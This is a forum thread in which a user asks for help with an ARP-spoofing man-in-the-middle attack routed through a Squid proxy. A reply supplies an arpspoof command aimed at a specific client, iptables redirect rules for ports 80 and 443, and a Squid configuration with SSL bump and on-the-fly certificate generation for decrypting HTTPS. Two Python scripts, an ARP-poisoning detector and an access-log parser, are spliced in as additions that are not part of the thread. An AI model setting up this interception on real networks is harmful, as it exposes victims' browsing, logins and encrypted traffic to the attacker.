
Thread: new MITM :redirecting all the LAN traffic thought proxy ?!

  1. #1
    Join Date
    2014-Jan
    Posts
    17

    new MITM :redirecting all the LAN traffic thought proxy ?!

    hi everyone ,
    I have been trying to do a MITM attack on the LAN with the help of a squid proxy server, but I seem to be missing something and I don't know where to start searching:
    First of all, what I do:
    * I start with iptables and redirect the traffic from port 80 to 3128 (I am adding 443 to redirect HTTPS to the same port as well)
    HTML Code:
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 3128
    and the other one
    HTML Code:
    iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 3128
    * then I configure squid to accept the traffic and redirect it back to the Internet. http://wiki.squid-cache.org/ConfigEx.../Portal/Splash
    * to make it all work I use arpspoof to take traffic from a specific client and redirect it from that client to the gateway.
    HTML Code:
    arpspoof -i wlan0 -t 10.0.0.116 10.0.0.254
    the is

    What DOES Work -
    * I can see that arpspoof is redirecting the traffic,
    * squid is doing the caching (well, at least the cache.log is getting bigger every moment).
    * iptables is doing the redirecting.
    What DOES NOT Work:
    * when the attacked client opens the browser - whatever address is entered - it is not going anywhere

    Can anyone suggest what I am missing or doing incorrectly?
    Thanks in advance.
    Last edited by br0k3ngl@55; 2014-09-01 at 06:55.
    The Bird of Hermes Is My Name, Eating My Wings To Make Me Tame
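    A defender-side check for the symptom the poster reports above (the victim's ARP cache pointing the gateway IP at a different machine's MAC), as an added example that is not part of the original post or the thread's tools: it parses two `arp -n` style snapshots and reports a gateway MAC change or one MAC claimed by two IPs. The addresses and MACs are constructed for illustration.

```python
"""Compare ARP-table snapshots to spot the classic ARP-poisoning symptom.

Added example, not from the forum thread. Input lines mimic `arp -n` output
on Linux; the addresses and MACs below are constructed for illustration.
"""
import re

# Constructed baseline snapshot taken when the LAN was known-good.
BASELINE = """\
Address                  HWtype  HWaddress           Flags Mask            Iface
10.0.0.254               ether   00:11:22:33:44:01   C                     wlan0
10.0.0.116               ether   00:11:22:33:44:16   C                     wlan0
10.0.0.120               ether   00:11:22:33:44:20   C                     wlan0
"""

# Constructed later snapshot: the gateway IP now resolves to the MAC that
# 10.0.0.120 already owns, which is what poisoning looks like from the
# victim's own cache.
POISONED = """\
Address                  HWtype  HWaddress           Flags Mask            Iface
10.0.0.254               ether   00:11:22:33:44:20   C                     wlan0
10.0.0.116               ether   00:11:22:33:44:16   C                     wlan0
10.0.0.120               ether   00:11:22:33:44:20   C                     wlan0
"""

MAC_RE = re.compile(r"^([0-9a-f]{2}:){5}[0-9a-f]{2}$", re.I)


def parse_arp_table(text):
    """Return {ip: mac} from `arp -n` style output, skipping the header line
    and entries without a hardware address (e.g. "(incomplete)")."""
    table = {}
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 3 or fields[0] == "Address":
            continue
        ip, mac = fields[0], fields[2].lower()
        if MAC_RE.match(mac):
            table[ip] = mac
    return table


def shared_macs(table):
    """Map each MAC claimed by more than one IP to the sorted list of those
    IPs. Two IPs on one MAC is the usual poisoning symptom."""
    by_mac = {}
    for ip, mac in table.items():
        by_mac.setdefault(mac, []).append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def gateway_changed(baseline, current, gateway_ip):
    """Return (old_mac, new_mac) if the gateway's MAC differs between the two
    snapshots, otherwise None."""
    old, new = baseline.get(gateway_ip), current.get(gateway_ip)
    if old and new and old != new:
        return old, new
    return None


def audit(baseline_text, current_text, gateway_ip):
    """Run both checks and return a list of human-readable findings."""
    base = parse_arp_table(baseline_text)
    cur = parse_arp_table(current_text)
    findings = []
    change = gateway_changed(base, cur, gateway_ip)
    if change:
        findings.append("gateway %s moved from %s to %s"
                        % (gateway_ip, change[0], change[1]))
    for mac, ips in shared_macs(cur).items():
        findings.append("MAC %s claimed by %s" % (mac, ", ".join(ips)))
    return findings


if __name__ == "__main__":
    for finding in audit(BASELINE, POISONED, "10.0.0.254"):
        print("ALERT:", finding)
```

    In practice the baseline is recorded once from a trusted state and the current snapshot is fed in periodically (or `arp -n` output is piped in); a static ARP entry for the gateway on the client is the usual mitigation once the symptom is confirmed.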

  2. #2
    Join Date
    2014-Jan
    Posts
    17
    Still searching for an answer - if anyone has a suggestion, please notify me by mail: [email protected]

  3. #3
    Join Date
    2014-Sep
    Posts
    1
    Have you tried running wireshark or fiddler on the client?

  4. #4
    Join Date
    2014-Jun
    Location
    Greece
    Posts
    133
    Hi there!

    There are a lot of things that have to be done to successfully perform a "Squid in the Middle" attack. Squid is a HUGE chapter.

    First of all, you cannot redirect port 443 if squid3 has not been compiled with SSL bump and dynamic SSL generation (you will find a lot of information on the Internet about how to do that). Squid 3.1.2 from Kali's repos doesn't offer that and as far as I know none do. You have to compile it yourself.

    Code:
    squid3 -v
    Squid Cache: Version 3.1.20
    configure options:  '--build=i486-linux-gnu' '--prefix=/usr' '--includedir=${prefix}/include' '--mandir=${prefix}/share/man' '--infodir=${prefix}/share/info' '--sysconfdir=/etc' '--localstatedir=/var' '--libexecdir=${prefix}/lib/squid3' '--srcdir=.' '--disable-maintainer-mode' '--disable-dependency-tracking' '--disable-silent-rules' '--datadir=/usr/share/squid3' '--sysconfdir=/etc/squid3' '--mandir=/usr/share/man' '--with-cppunit-basedir=/usr' '--enable-inline' '--enable-async-io=8' '--enable-storeio=ufs,aufs,diskd' '--enable-removal-policies=lru,heap' '--enable-delay-pools' '--enable-cache-digests' '--enable-underscores' '--enable-icap-client' '--enable-follow-x-forwarded-for' '--enable-auth=basic,digest,ntlm,negotiate' '--enable-basic-auth-helpers=LDAP,MSNT,NCSA,PAM,SASL,SMB,YP,DB,POP3,getpwnam,squid_radius_auth,multi-domain-NTLM' '--enable-ntlm-auth-helpers=smb_lm,' '--enable-digest-auth-helpers=ldap,password' '--enable-negotiate-auth-helpers=squid_kerb_auth' '--enable-external-acl-helpers=ip_user,ldap_group,session,unix_group,wbinfo_group' '--enable-arp-acl' '--enable-esi' '--enable-zph-qos' '--enable-wccpv2' '--disable-translation' '--with-logdir=/var/log/squid3' '--with-pidfile=/var/run/squid3.pid' '--with-filedescriptors=65536' '--with-large-files' '--with-default-user=proxy' '--enable-linux-netfilter' 'build_alias=i486-linux-gnu' 'CFLAGS=-g -O2 -fPIE -fstack-protector --param=ssp-buffer-size=4 -Wformat -Werror=format-security -Wall' 'LDFLAGS=-fPIE -pie -Wl,-z,relro -Wl,-z,now' 'CPPFLAGS=-D_FORTIFY_SOURCE=2' 'CXXFLAGS=-g -O2 -fPIE -fstack-protector --param=ssp-buffer-size=4 -Wformat -Werror=format-security' --with-squid=/build/squid3-tMZN4r/squid3-3.1.20

    Second, the squid.conf file has to be in the right form and the rules (ACLs) have to be in the correct form. (Where is your squid.conf?)

    ex:
    Code:
    acl localnet src 192.168.60.0/24  	# My LAN
    acl safeports port 21 70 80 210 280 443 488 563 591 631 777 901 81 3127-3129 1025-65535
    acl sslports port 443 563 81 2087 8081 10000
    acl connect method CONNECT
    http_access allow manager localhost
    http_access deny manager
    http_access deny !safeports
    http_access deny CONNECT !sslports
    http_access allow localhost
    http_access allow localnet
    http_access deny all
    
    always_direct allow all # Critical!
    ssl_bump server-first all # Critical!
    
    # Ports :3127 http proxy, 3128 http transparent, 3129 https transparent.
    http_port 3127 # Critical!
    http_port 3128 intercept # Critical!
    https_port 3129 intercept ssl-bump generate-host-certificates=on dynamic_cert_mem_cache_size=4MB cert=/../.../certificates/personal-ca.pem key=/../../certificates/personal-ca.pem # Critical!
    
    sslcrtd_program /usr/lib/squid3/ssl_crtd -s /var/lib/ssl_db -M 4MB
    sslcrtd_children 10 startup=5 idle=2
    
    # Place your DNS servers here
    dns_nameservers DNS1 DNS2
    
    hierarchy_stoplist cgi-bin ?
    
    # Memory Cache Options 512 MB of RAM 
    cache_mem 512 MB
    maximum_object_size_in_memory 5MB
    
    refresh_pattern ^ftp:		1440	20%	10080
    refresh_pattern ^gopher:	1440	0%	1440
    refresh_pattern -i (/cgi-bin/|\?) 0	0%	0
    refresh_pattern .		0	20%	4320
    coredump_dir /var/spool/squid3
    access_log stdio:/var/log/squid3/access.log squid
    As you can see I've already created a CA root certificate (personal-ca.pem) which is being used in squid3.

    The iptables rules for the previous squid.conf file should look something like this (I'm not using ARPspoof):

    Code:
    # Enable IPv4 forward
    echo 1 > /proc/sys/net/ipv4/ip_forward
    
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    
    iptables --table nat --append POSTROUTING --out-interface IFACE -j MASQUERADE
    iptables --append FORWARD --in-interface LANFACE -j ACCEPT
    iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to INETIP
    
    # Transparent Squid3 Http & Https (Squid3 listens to 3128 (http traffic transparent) and 3129 (https traffic transparent) 
    # localhost can access Squid3 to 3127 normal http proxy traffic
    iptables -t nat -A PREROUTING -i LANFACE -p tcp -m tcp --dport 80 -j DNAT --to-destination 192.168.60.129:3128
    iptables -t nat -A PREROUTING -i LANFACE -p tcp -m tcp --dport 443 -j DNAT --to-destination 192.168.60.129:3129
    iptables -t nat -A PREROUTING -i IFACE -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 3128
    iptables -t nat -A PREROUTING -i IFACE -p tcp -m tcp --dport 443 -j REDIRECT --to-ports 3129
    Where:
    IFACE = your Internet interface (e.g. eth0)
    INETIP = IP of the Internet interface
    LANFACE = the LAN interface you're trying to intercept (e.g. eth1)

    I suggest you first try to set up a transparent proxied LAN and then move forward to a more advanced subject such as an SSL-intercepted LAN. Luckily there is a lot of info on the Internet to accomplish that or any other task you decide to take on. It's crucial to understand what you are doing before you try it. I'm trying to say that just following another guy's instructions about how to do that is not enough. You HAVE to understand what you are doing.

    If you have enough patience, I will upload in a month or so a script where a Squid in the middle attack in a wireless LAN is included.

    Good luck!

    PS Please don't ask for a "private" solution to your e-mail. It's a good thing to get solutions publicly. I'm sure that other people will face the exact same problems as you are.
    PS2 access.log and cache.log are your friends.
    Last edited by Nick_the_Greek; 2014-09-08 at 16:07.
    Security always begins with personal responsibility. - quietman7
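    Nick's PS2 says access.log and cache.log are your friends. As an added example (not Nick's code and not a Squid tool), here is a small parser for the native `squid` logformat that the `access_log ... squid` line in the config above writes, summarising per-client result codes so that the two failure modes discussed in this thread show up directly: requests hitting `TCP_DENIED` (an `http_access` ACL problem) and `NONE/400 error:invalid-request` entries (non-HTTP bytes, typically TLS, arriving on a plain `http_port`). The log lines are constructed for illustration.

```python
"""Summarise a Squid access.log written in the native "squid" logformat.

Added example, not from the forum thread. Field order of the native format:
time elapsed client code/status bytes method URL user hierarchy/peer type.
The sample lines are constructed for illustration.
"""
from collections import Counter, defaultdict

SAMPLE_LOG = """\
1409572801.101    45 10.0.0.116 TCP_MISS/200 5120 GET http://example.com/ - HIER_DIRECT/93.184.216.34 text/html
1409572802.220     0 10.0.0.116 TCP_DENIED/403 3640 GET http://example.com/style.css - HIER_NONE/- text/html
1409572803.330     0 10.0.0.116 TCP_DENIED/403 3650 CONNECT example.com:443 - HIER_NONE/- text/html
1409572804.440   120 10.0.0.120 TCP_HIT/200 22000 GET http://example.org/logo.png - HIER_NONE/- image/png
1409572805.550    12 10.0.0.120 NONE/400 3500 NONE error:invalid-request - HIER_NONE/- text/html
"""


def parse_line(line):
    """Parse one native-format line into a dict, or None if it is malformed."""
    f = line.split()
    if len(f) < 10:
        return None
    code, status = f[3].split("/", 1)
    hier, peer = f[8].split("/", 1)
    return {
        "time": float(f[0]), "elapsed_ms": int(f[1]), "client": f[2],
        "code": code, "status": int(status), "bytes": int(f[4]),
        "method": f[5], "url": f[6], "user": f[7],
        "hier": hier, "peer": peer, "type": f[9],
    }


def summarize(text):
    """Return {client: {"requests": n, "bytes": n, "codes": Counter}}."""
    per_client = defaultdict(lambda: {"requests": 0, "bytes": 0, "codes": Counter()})
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        s = per_client[rec["client"]]
        s["requests"] += 1
        s["bytes"] += rec["bytes"]
        s["codes"][rec["code"]] += 1
    return dict(per_client)


def diagnose(summary):
    """Turn the per-client counts into the hints a transparent-proxy operator
    needs: TCP_DENIED counts point at http_access ACLs, NONE entries point at
    non-HTTP traffic (e.g. TLS redirected to a plain http_port)."""
    hints = []
    for client, s in sorted(summary.items()):
        denied = s["codes"]["TCP_DENIED"]
        if denied:
            hints.append("%s: %d/%d requests TCP_DENIED (check http_access ACLs)"
                         % (client, denied, s["requests"]))
        invalid = s["codes"]["NONE"]
        if invalid:
            hints.append("%s: %d invalid request(s) (non-HTTP bytes on an http_port?)"
                         % (client, invalid))
    return hints


if __name__ == "__main__":
    for hint in diagnose(summarize(SAMPLE_LOG)):
        print(hint)
```

    Point it at a real file with `summarize(open("/var/log/squid3/access.log").read())`; because the native format has no spaces inside fields other than the URL's absence of them, whitespace splitting is reliable for it, whereas the `combined` format would need a proper regex.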

  5. #5
    Join Date
    2014-Jun
    Location
    Greece
    Posts
    133
    Hi there!
    Here is an example of how to do this. I just finished it:
    SSL Interception with Squid3 (MITM)
